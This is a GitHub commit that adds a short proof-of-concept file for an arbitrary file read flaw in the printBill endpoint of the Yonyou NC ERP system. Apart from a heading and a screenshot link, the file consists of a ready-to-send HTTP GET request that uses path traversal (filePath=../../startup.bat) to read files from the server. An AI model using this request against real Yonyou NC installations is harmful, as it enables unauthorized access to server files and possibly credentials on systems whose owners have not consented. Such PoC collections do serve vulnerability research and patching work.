Create 用友NC系统printBill接口存在任意文件读取漏洞.md

This commit is contained in:
wy876 2024-05-13 20:01:32 +08:00 committed by GitHub
parent e17958c8ce
commit 5ccbc9f5ae
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -0,0 +1,15 @@
## 用友NC系统printBill接口存在任意文件读取漏洞
## poc
```
GET /portal/pt/printpdf/printBill?pageId=login&filePath=../../startup.bat HTTP/1.1
Host: 192.168.63.129:8088
User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
```
![image](https://github.com/wy876/POC/assets/139549762/af404736-3588-4d7c-a76e-d781fb1d1251)